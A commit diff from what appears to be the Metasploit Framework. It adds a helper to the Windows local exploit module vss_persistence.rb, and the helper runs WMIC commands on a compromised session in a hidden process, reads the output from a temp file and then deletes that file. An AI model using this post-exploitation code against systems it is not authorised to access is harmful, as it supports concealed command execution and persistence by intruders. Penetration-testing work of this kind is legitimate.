Fix #4558 by restoring the old wmicexec

2015-07-27 14:04:10 -05:00 · 2015-07-27 14:04:10 -05:00 · bf6975c01a
parent 2d0a26ea8b
commit bf6975c01a
1 changed files with 47 additions and 0 deletions
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@ -194,4 +194,51 @@ class Metasploit3 < Msf::Exploit::Local
    print_status("Cleanup Meterpreter RC File: #{clean_rc}")
  end

+  #
+  # Execute a WMIC command
+  #
+  def wmic_query(wmic_cmd)
+    tmp_out = ''
+    old_timeout = session.response_timeout
+    session.response_timeout = 120
+    begin
+      tmp = expand_path('%TEMP%')
+      wmi_cfl = tmp + "\\" + sprintf('%.5d', rand(100000))
+      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmi_cfl} #{wmic_cmd}", nil, {'Hidden' => true})
+      Rex.sleep(2)
+
+      # Making sure that wmic finishes before executing next wmic command
+      found = 0
+      while found == 0
+        session.sys.process.get_processes.each do |x|
+          found =1
+          if 'wmic.exe' == x['name'].downcase
+            Rex.sleep(0.5)
+            found = 0
+          end
+        end
+      end
+      r.close
+
+      # Give the process time to flush the output
+      Rex.sleep(2)
+
+      # Read the output file of the wmic commands
+      wmi_out_file = session.fs.file.new(wmi_cfl, 'rb')
+      until wmi_out_file.eof?
+        tmp_out << wmi_out_file.read
+      end
+      wmi_out_file.close
+    rescue ::Exception => e
+      print_error("Error running WMIC commands: #{e.class} #{e}")
+    end
+    # We delete the file with the wmic command output.
+    c = session.sys.process.execute("cmd.exe /c del #{wmi_cfl}", nil, {'Hidden' => true})
+    c.close
+    tmp_out.gsub!(/[^[:print:]]/,'') #scrub out garbage
+
+    session.response_timeout = old_timeout
+    tmp_out
+  end
+
 end